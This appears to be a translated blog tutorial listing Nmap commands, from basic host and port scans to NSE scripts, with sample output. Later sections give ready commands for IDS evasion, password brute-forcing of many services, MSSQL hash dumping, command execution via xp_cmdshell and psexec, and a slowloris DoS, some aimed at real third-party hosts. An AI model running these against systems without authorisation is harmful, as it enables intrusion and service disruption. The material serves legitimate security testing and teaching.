# Common Nmap command syntax

Nmap is a network port scanner: it scans the open ports of machines on a network, determines which services run on which ports, and infers which operating system a machine runs. Like most tools used in network security, Nmap is also popular with hackers and crackers. A system administrator can use Nmap to detect unauthorized servers in the working environment, while an attacker uses it to gather a target's network configuration in order to plan an attack.


### Host discovery scans

Batch ping sweep: the -sP option (the older spelling of -sn) scans a subnet for live hosts; only hosts that are up appear in the result.

    [root@localhost ~]# nmap -sP 192.168.1.0/24 > scan.log
    [root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'

Skipping the ping probe: some hosts block ping, so -P0 (the older spelling of -Pn) skips the ping probe entirely, which speeds up the scan.

    [root@localhost ~]# nmap -P0 192.168.1.7

Listing the hosts in a subnet: -sL only lists every host in the given range and sends no probe packets to the targets.

    [root@localhost ~]# nmap -sL 192.168.1.0/24 > scan.log
    [root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'

Scanning for live hosts: -sn lists the hosts that are up in a subnet, much like the batch ping sweep.

    [root@localhost ~]# nmap -sn 27.201.193.0/24 > scan.log
    [root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'

Scanning an IP address range: restrict the probe to a given range of addresses and see which of them are up.

    [root@localhost ~]# nmap -sP 192.168.1.1-10
    [root@localhost ~]# nmap -sP 27.201.193.100-200

Probing open ports (TCP/UDP): probe the ports open on the target. A comma-separated port list can be given, with a T: or U: prefix selecting the protocol, e.g. -p T:22,443,80; UDP ports are only probed when a UDP scan (-sU) is requested.

    [root@localhost ~]# nmap -p T:22,80,443 192.168.1.10          // TCP probe
    [root@localhost ~]# nmap -sU -p U:22,80,443 192.168.1.10      // UDP probe
    [root@localhost ~]# nmap -p smtp,http,https 192.168.1.10      // ports given by service name

Scan types (SYN/TCP/UDP): SYN half-open scan, full TCP connect scan, and others.

    [root@localhost ~]# nmap -sS 192.168.1.10       // SYN scan
    [root@localhost ~]# nmap -sT 192.168.1.10       // TCP connect scan
    [root@localhost ~]# nmap -sU 192.168.1.10       // UDP scan
    [root@localhost ~]# nmap -sA 192.168.1.10       // TCP ACK scan

IP protocol scan: -sO determines which IP protocols (TCP, ICMP, IGMP, ...) the target supports.

    [root@localhost ~]# nmap -sO 192.168.1.10 | grep '^[0-9]'
    1        open  icmp
    6        open  tcp
    7        open  udp

OS detection: -O guesses the target's operating system; the result is a best guess and is not always accurate.

    [root@localhost ~]# nmap -O 192.168.1.10 | grep "Running:"
    Running: Microsoft Windows 2000 | XP

Service version detection: -sV identifies the specific version of each service running on the target.

    [root@localhost ~]# nmap -sV 192.168.1.10 | grep '^[0-9]'
    80/tcp   open   http            Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
    3306/tcp open   mysql           MySQL 5.5.53
    139/tcp  open   netbios-ssn
    443/tcp  open   ssl/http        VMware VirtualCenter Web service
    445/tcp  closed microsoft-ds
    912/tcp  open   vmware-auth     VMware Authentication Daemon 1.0 (Uses VNC, SOAP)

Packet tracing: --packet-trace prints every packet sent and received, showing the flow of the probe traffic.

    [root@localhost ~]# nmap --packet-trace 192.168.1.10
    SENT (4.7014s) TCP 192.168.1.30:50000 > 192.168.1.10:3527 S
    SENT (4.7100s) TCP 192.168.1.30:50000 > 192.168.1.10:4446 S

Listing local interfaces: --iflist prints the detected network interfaces and the system routing table.

    [root@localhost ~]# nmap --iflist 192.168.1.10

Scanning several hosts: scan multiple targets in one run, as opposed to scanning a whole subnet.

    [root@localhost ~]# nmap -sP 192.168.1.10 192.168.1.20
    [root@localhost ~]# nmap -sP 192.168.1.10 192.168.1.20 192.168.1.30

Excluding hosts from a scan:

    nmap 10.0.1.161-162 --exclude 10.0.1.162                // exclude a single host
    nmap 10.0.1.161-163 --exclude 10.0.1.162-163            // exclude a contiguous range
    nmap 10.0.1.161-163 --exclude 10.0.1.161,10.0.1.163     // exclude scattered hosts
    nmap 10.0.1.161-163 --excludefile ex.txt                // exclude the hosts listed in a file

Controlling scan timing: adjust the interval between probes so the scanner does not wait too long on any single host.

    [root@localhost ~]# nmap --scan-delay 1 192.168.1.10         // wait 1 second between probes
    [root@localhost ~]# nmap --max-scan-delay 1 192.168.1.10     // wait at most 1 second
    [root@localhost ~]# nmap --max-retries 1 192.168.1.10        // retransmit a probe at most once

Output formats: the -o options write the scan result in a chosen file format.

    [root@localhost ~]# nmap -oX lyshark.xml 192.168.1.10     // XML output
    [root@localhost ~]# nmap -oN lyshark.log 192.168.1.10     // normal (human-readable) output to a text file
    [root@localhost ~]# nmap -oG lyshark.log 192.168.1.10     // grepable output

Reading targets from a file: -iL reads a list of IP addresses or hostnames from a file and scans them.

    [root@localhost ~]# cat lyshark.log
    localhost
    www.baidu.com
    192.168.1.7

    [root@localhost ~]# nmap -iL lyshark.log

### Firewall and IDS evasion

Evading IDS detection: use a slow timing template (-T0 Paranoid or -T1 Sneaky) to reduce the chance of being picked up by an IDS.

    [root@localhost ~]# nmap -T0 192.168.1.10
    [root@localhost ~]# nmap -T1 192.168.1.10

Fragmented probes: -f splits the TCP header across several packets, which makes detection by packet filters, IDS and similar tools harder.

    [root@localhost ~]# nmap -f 192.168.1.10            // automatic fragmentation
    [root@localhost ~]# nmap --mtu 8 192.168.1.10       // custom fragment size (8, 16, ...); must be a multiple of 8

Decoy scanning: -D hides the scan among decoy source addresses; your own real IP can be included as one of the decoys.

    [root@localhost ~]# nmap -D 192.168.1.1 192.168.1.10

### Using NSE scripts

Nmap is not just a port scanner and service detector: it also has a powerful scripting engine, and Nmap scripts (NSE) make it quick to probe a server. The bundled scripts normally live under /usr/share/nmap/scripts and carry the .nse extension. The most commonly used scanning scripts are introduced below.

Scanning for sensitive web directories: --script=http-enum.nse enumerates a web site's sensitive directories.

    [root@localhost ~]# nmap -p 80 --script=http-enum.nse www.mkdirs.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 01:49 EDT
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.000010s latency).
    Not shown: 995 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    25/tcp   open  smtp
    80/tcp   open  http
    | http-enum:
    |   /login.php: Possible admin folder
    |   /robots.txt: Robots file
    |   /config/: Potentially interesting folder w/ directory listing
    |   /docs/: Potentially interesting folder w/ directory listing
    |   /external/: Potentially interesting folder w/ directory listing
    |_  /icons/: Potentially interesting folder w/ directory listing
    3306/tcp open  mysql

    Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds

Authentication scripts: the auth category contains the scripts that deal with authentication credentials (bypassing authentication); it can also be used to detect weak passwords in some applications.

    [root@localhost ~]# nmap --script=auth www.mkdirs.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:16 EDT
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.0000090s latency).
    Not shown: 995 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_drwxr-xr-x    2 0        0               6 Oct 30 19:45 pub
    22/tcp   open  ssh
    25/tcp   open  smtp
    | smtp-enum-users:
    |_  root
    80/tcp   open  http
    | http-domino-enum-passwords:
    |_  ERROR: No valid credentials were found
    3306/tcp open  mysql

    Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds

Default script scan: the default category mainly gathers information about the various application services; once gathered, that information can be used to go after a specific service.

    [root@localhost ~]# nmap --script=default www.mkdirs.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:21 EDT
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.000010s latency).
    Not shown: 995 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_drwxr-xr-x    2 0        0               6 Oct 30 19:45 pub
    22/tcp   open  ssh
    | ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
    |_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
    3306/tcp open  mysql
    | mysql-info: Protocol: 10
    | Version: 5.5.60-MariaDB
    | Thread ID: 10408
    | Status: Autocommit
    |_Salt: <D"y]F(2

    Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

Checking common vulnerabilities: --script=vuln scans a web site for common vulnerabilities, as well as its directory structure.

    [root@localhost ~]# nmap --script=vuln www.mkdirs.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:24 EDT
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.000017s latency).
    Not shown: 995 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    25/tcp   open  smtp
    | smtp-vuln-cve2010-4344:
    |_  The SMTP server is not Exim: NOT VULNERABLE
    80/tcp   open  http
    | http-enum:
    |   /login.php: Possible admin folder
    |   /robots.txt: Robots file
    |   /config/: Potentially interesting folder w/ directory listing
    |   /docs/: Potentially interesting folder w/ directory listing
    |   /external/: Potentially interesting folder w/ directory listing
    |_  /icons/: Potentially interesting folder w/ directory listing
    |_http-fileupload-exploiter:
    |_http-frontpage-login: false
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    3306/tcp open  mysql

    Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Discovering LAN services: --script=broadcast probes the local network to find out which additional services are running.

    [root@localhost ~]# nmap -n -p445 --script=broadcast 127.0.0.1

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:28 EDT
    Pre-scan script results:
    | broadcast-dhcp-discover:
    |   IP Offered: 192.168.1.14
    |   Server Identifier: 192.168.1.1
    |   Subnet Mask: 255.255.255.0
    |   Router: 192.168.1.1
    |_  Domain Name Server: 192.168.1.1
    | broadcast-eigrp-discovery:
    |_ ERROR: Couldn't get an A.S value.
    | broadcast-listener:
    |   ether
    |       ARP Request
    |         sender ip    sender mac         target ip
    |         192.168.1.1  43:72:23:04:56:21  192.168.1.2
    |         192.168.1.2  B4:8C:28:BE:4C:34  192.168.1.1
    |       EIGRP Update
    ........

WHOIS lookup: the --script whois module looks up basic registration information for the site.

    [root@localhost ~]# nmap --script whois www.baidu.com

    Host script results:
    | whois: Record found at whois.apnic.net
    | inetnum: 61.135.0.0 - 61.135.255.255
    | netname: UNICOM-BJ
    | descr: China Unicom Beijing province network
    | country: CN
    | person: ChinaUnicom Hostmaster
    |_email: hqs-ipabuse@chinaunicom.cn

    Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds

Detailed WHOIS lookup: the external category uses third-party databases and resources for a more detailed lookup.

    [root@localhost ~]# nmap --script external www.baidu.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:31 EDT
    Nmap scan report for www.baidu.com (61.135.169.125)
    Host is up (0.018s latency).
    |_http-robtex-shared-ns: ERROR: Script execution failed (use -d to debug)
    | ip-geolocation-geoplugin:
    | 61.135.169.125 (www.baidu.com)
    |   coordinates (lat,lon): 39.9288,116.3889
    |_  state: Beijing, China
    |_ip-geolocation-maxmind: ERROR: Script execution failed (use -d to debug)
    | whois: Record found at whois.apnic.net
    | inetnum: 61.135.0.0 - 61.135.255.255
    | netname: UNICOM-BJ
    | descr: China Unicom Beijing province network
    |_country: CN
    .....

Finding the internal gateway: --script=broadcast-netbios-master-browser can be used to discover the address of the internal gateway.

    [root@localhost ~]# nmap --script=broadcast-netbios-master-browser 192.168.1.1

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:05 EDT
    Pre-scan script results:
    | broadcast-netbios-master-browser:
    | ip           server          domain
    |_192.168.1.2  Web-Server     WORKGROUP
    Nmap scan report for 192.168.1.1
    Host is up (0.0011s latency).
    Not shown: 998 closed ports
    PORT     STATE    SERVICE
    80/tcp   filtered http
    1900/tcp open     upnp
    MAC Address: 42:1C:1B:E7:B1:B2 (TP-Link)

Retrieving the web robots file: --script=http-robots.txt.nse shows the contents of robots.txt.

    [root@localhost scripts]# nmap --script=http-robots.txt.nse www.baidu.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:12 EDT
    Nmap scan report for www.baidu.com (61.135.169.125)
    Host is up (0.019s latency).
    Other addresses for www.baidu.com (not scanned): 61.135.169.121
    Not shown: 998 filtered ports
    PORT    STATE SERVICE
    80/tcp  open  http
    | http-robots.txt: 9 disallowed entries
    | /baidu /s? /ulink? /link? /home/news/data/ /shifen/
    |_/homepage/ /cpro /
    443/tcp open  https
    | http-robots.txt: 9 disallowed entries
    | /baidu /s? /ulink? /link? /home/news/data/ /shifen/
    |_/homepage/ /cpro /

    Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds

Checking the web server's clock: report the web server's current time.

    [root@localhost scripts]# nmap -p 443 --script http-date.nse www.baidu.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:16 EDT
    Nmap scan report for www.baidu.com (61.135.169.121)
    Host is up (0.017s latency).
    Other addresses for www.baidu.com (not scanned): 61.135.169.125
    PORT    STATE SERVICE
    443/tcp open  https
    |_http-date: Sun, 31 Mar 2019 06:16:53 GMT; 0s from local time.

    Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Running a DoS attack: a DoS attack; it still works well against sites with little processing capacity.

    [root@localhost ~]# nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com
    Warning: Your max-parallelism (-M) option is extraordinarily high, which can hurt reliability

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:21 EDT

Checking DNS zone transfers: check whether the target's name servers allow zone transfers; if they do, the subdomains can simply be pulled out.

    [root@localhost scripts]# nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:28 EDT
    NSE: Loaded 1 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating Ping Scan at 02:28
    Scanning www.baidu.com (61.135.169.121) [4 ports]
    Completed Ping Scan at 02:28, 0.02s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 02:28
    Completed Parallel DNS resolution of 1 host. at 02:28, 0.01s elapsed
    Initiating SYN Stealth Scan at 02:28
    Scanning www.baidu.com (61.135.169.121) [1 port]
    Completed SYN Stealth Scan at 02:28, 0.20s elapsed (1 total ports)
    NSE: Script scanning 61.135.169.121.
    Nmap scan report for www.baidu.com (61.135.169.121)
    Host is up (0.016s latency).
    Other addresses for www.baidu.com (not scanned): 61.135.169.125
    PORT   STATE    SERVICE
    53/tcp filtered domain

    NSE: Script Post-scanning.
    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
               Raw packets sent: 6 (240B) | Rcvd: 1 (28B)

Querying sites on the same host: a reverse-IP lookup. The ip2hosts API appears to have been discontinued long ago; to keep using the script, change the API section of its code yourself.

    [root@localhost scripts]# nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:29 EDT
    Nmap scan report for www.baidu.com (61.135.169.121)
    Host is up (0.017s latency).
    Other addresses for www.baidu.com (not scanned): 61.135.169.125
    PORT   STATE SERVICE
    80/tcp open  http

    Host script results:
    | hostmap-ip2hosts:
    |_  hosts: Error: could not GET http://www.ip2hosts.com/csv.php?ip=61.135.169.121

    Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds

### Password brute-force scripts

Brute-forcing DNS records: baidu's domain is used as the example; the output is abridged because it is long.

    [root@localhost scripts]# nmap --script=dns-brute.nse www.baidu.com

    Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:19 EDT
    Nmap scan report for www.baidu.com (61.135.169.125)
    Host is up (0.018s latency).
    Other addresses for www.baidu.com (not scanned): 61.135.169.121
    Not shown: 998 filtered ports
    PORT    STATE SERVICE
    80/tcp  open  http
    443/tcp open  https

    Host script results:
    | dns-brute:
    |   DNS Brute-force hostnames
    |     lab.baidu.com - 180.149.144.192
    |     lab.baidu.com - 180.149.132.122
    |     corp.baidu.com - 123.129.254.12
    |_    log.baidu.com - 10.26.39.14

    Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds

VNC scanning on the LAN: use the VNC scripts to check the VNC version and other sensitive information.

    [root@localhost ~]# nmap --script=realvnc-auth-bypass 127.0.0.1                                            # RealVNC authentication bypass check
    [root@localhost ~]# nmap --script=vnc-auth 127.0.0.1                                                       # check the VNC authentication method
    [root@localhost ~]# nmap --script=vnc-info 127.0.0.1                                                       # retrieve VNC information
    [root@localhost ~]# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1  # brute-force VNC passwords

SMB scanning on the LAN: check the Samba servers on the local network and brute-force them.

    [root@localhost ~]# nmap --script=smb-brute.nse 127.0.0.1                                                            # simple attempt to brute-force the SMB service
    [root@localhost ~]# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1                               # checks for several known serious SMB vulnerabilities
    [root@localhost ~]# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1            # brute-force with user and password list files
    [root@localhost ~]# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1             # query sensitive host information (nmap_service)
    [root@localhost ~]# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1  # list sessions
    [root@localhost ~]# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1   # OS information

MSSQL scanning: check the SQL Server hosts on the local network and brute-force them.

    [root@localhost ~]# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1  # brute-force MSSQL passwords
    [root@localhost ~]# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1   # dump password hashes
    [root@localhost ~]# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4      # execute a command via xp_cmdshell

MySQL scanning: check the MySQL servers on the local network and brute-force them.

    [root@localhost ~]# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1                                             # check for an empty root password
    [root@localhost ~]# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1                         # list all users
    [root@localhost ~]# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1  # brute-force MySQL passwords

Oracle scanning: check the Oracle servers on the local network and brute-force them.

    [root@localhost ~]# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1    # Oracle SID scan
    [root@localhost ~]# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1     # Oracle weak-password brute-force

Brute-forcing Telnet:

    nmap -p 23 --script telnet-brute \
               --script-args userdb=myusers.lst,passdb=.mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

Other script invocations:

    nmap --script=broadcast-netbios-master-browser 192.168.137.4                                                    # find the gateway
    nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4                           # rsync brute-force
    nmap --script informix-brute -p 9088 192.168.137.4                                                              # Informix database brute-force
    nmap -p 5432 --script pgsql-brute 192.168.137.4                                                                 # PostgreSQL brute-force
    nmap -sU --script snmp-brute 192.168.137.4                                                                      # SNMP brute-force
    nmap -sV --script=telnet-brute 192.168.137.4                                                                    # Telnet brute-force
    nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>    # JBoss autopwn
    nmap --script=http-methods.nse 192.168.137.4                                                                    # check supported HTTP methods
    nmap --script http-slowloris --max-parallelism 400 192.168.137.4                                                # DoS with 'half-HTTP' connections; works well against sites with little processing capacity
    nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4                                                     # Samba CVE-2012-1182 check
    nmap -iR 1000 -sS -PS80 -p 80 -oG nmap.txt                                                                      # 1000 random targets, SYN scan of port 80, grepable output

### Using Nmap as a vulnerability scanner

1. Download the vulscan project from https://github.com/scipag/vulscan, unpack the whole thing into Nmap's scripts directory, then run:

    nmap -sV --script=vulscan/vulscan.nse [ip]
    # scan with the default vulnerability databases
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=cve.csv [ip]
    # scan with one specific database, cve.csv
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=exploitdb.csv [ip]
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=securitytracker.csv [ip]
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv [ip]
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv [ip]
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=openvas.csv [ip]
    nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=osvdb.csv [ip]
Original article: https://www.cnblogs.com/LyShark/p/11136300.html